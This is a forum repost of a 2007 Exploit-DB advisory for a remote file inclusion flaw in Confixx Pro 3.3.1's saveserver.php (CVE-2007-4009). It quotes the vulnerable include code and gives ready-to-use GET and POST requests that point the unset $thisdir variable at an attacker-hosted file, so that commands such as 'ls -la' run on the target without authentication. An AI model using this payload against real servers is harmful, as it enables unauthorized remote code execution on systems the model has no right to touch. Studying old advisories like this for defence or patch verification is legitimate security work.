Exploit Confixx Pro 3.3.1 - 'saveserver.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4219
Проверка EDB
  1. Пройдено
Автор
H4 / XPK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-4009
Дата публикации
2007-07-24
Код:
[*] Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
__________________________________________________________________________

[!] Application homepage :   http://www.swsoft.com/de/products/confixx/
[!] Author               :   H4 / XPK
[!] Contact              :   http://xpkzxc.com/
[!] Bug discovered       :   2007-07-21
[!] Bug published        :   2007-07-24
[!] Risk                 :   Moderate

Do not forget visit our page for new vulnerabilites , information and tools.

---------------------------------------------------------------------

Vuln. code: admin/business_inc/saveserver.php

Lines 8-11

if( !in_array($returnto, $actions) )
{
        include( $thisdir . "/business_inc/list.php" );
}

Variable $thisdir is not defined ...

---------------------------------------------------------------------

An attacker does not need to be authenticated to access this file.

[!] Conditions: open_basedir restriction off and allow_url_fopen = on

[!] Exploitation : http://[target]/admin/business_inc/saveserver.php

Post: thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la
Get: saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la

---------------------------------------------------------------------

# milw0rm.com [2007-07-24]
 
Источник
www.exploit-db.com

Похожие темы